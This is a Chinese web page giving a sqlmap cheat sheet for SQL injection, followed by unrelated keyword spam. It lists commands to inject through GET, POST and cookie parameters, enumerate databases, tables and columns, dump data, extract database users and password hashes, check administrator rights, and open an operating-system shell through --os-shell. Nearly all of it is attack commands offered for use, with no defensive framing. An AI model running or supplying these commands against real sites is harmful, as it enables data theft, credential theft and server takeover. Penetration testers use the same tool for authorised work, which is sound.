千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 网络安全 >

sqlmap命令

发表于:2024-11-14 作者:千家信息网编辑
千家信息网最后更新 2024年11月14日,SQLMAPGET 方式的注入 sqlmap.py -u "URL"POST 方式的注入 sqlmap.py -u "URL" --data "POST参数=POST数值"COOKIE 方式的注入 s
千家信息网最后更新 2024年11月14日sqlmap命令

SQLMAP

GET 方式的注入 sqlmap.py -u "URL"

POST 方式的注入 sqlmap.py -u "URL" --data "POST参数=POST数值"

COOKIE 方式的注入 sqlmap.py -u "URL" --cookie "cookies 值"


爆数据库名(cookie根据实际的情况) sqlmap.py -u "URL" [--cookie "cookies 值"] --dbs

爆目标数据库中的表 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 --tables

爆目标数据表字段 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 -T 表名 --columns

导出目标字段的数据 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 -T 表名 -C 要导出数据的字段名,多个字段用逗号分隔 --dump


爆出目标库有多少数据 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 --count


检测当前用户 sqlmap.py -u "URL" [--cookie "cookies 值"] --current-user

检测当前用户是否管理员 sqlmap.py -u "URL" [--cookie "cookies 值"] --is-dba

检测数据库用户 sqlmap.py -u "URL" [--cookie "cookies 值"] --user -v 0

检测数据库用户密码 sqlmap.py -u "URL" [--cookie "cookies 值"] --password -v 0

检测当前数据库 sqlmap.py -u "URL" [--cookie "cookies 值"] --current-db

多线程 -threading 5


如果是管理员,我们可以写Shell


操作系统Shell写入

sqlmap.py -u "URL" [--cookie "cookies 值"] --os-shell


很赞哦!
数据 数据库 检测 字段 用户 目标 方式 管理员 管理 操作系统 参数 多个 实际 密码 情况 数值 数据表 系统 线程 逗号 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 数据库数据的添加 杭州瑞易迪网络技术有限公司 自考考生服务平台服务器 壁山网络安全系统 转账提示数据库表客户信息 数据库md5加密 流放者柯南云服务器 工业级服务器对空气环境要求 潮汕软件开发要多少钱 禧泰全国房地产数据库估价 网络安全主题文章的好题目 涉密信息系统软件开发资质 数据库三层模型 安徽上团互联网科技 怎样读取服务器的文件 服务器配什么linux 软件开发代运营协议 psv如何重新构筑数据库 git上传代码到服务器 保障网络安全安全无 东至智能软件开发服务解决方案 广州百田软件开发笔试题 数据库管理系统分类 潍坊网络安全工作培训会议 能整篇论文查找的中文数据库 超融合服务器设置 学软件开发的高职学校哪个好 上海单机版外贸软件开发公司 重庆海涛软件开发有限公司 怎么安装数据库sql2019

相关文章

0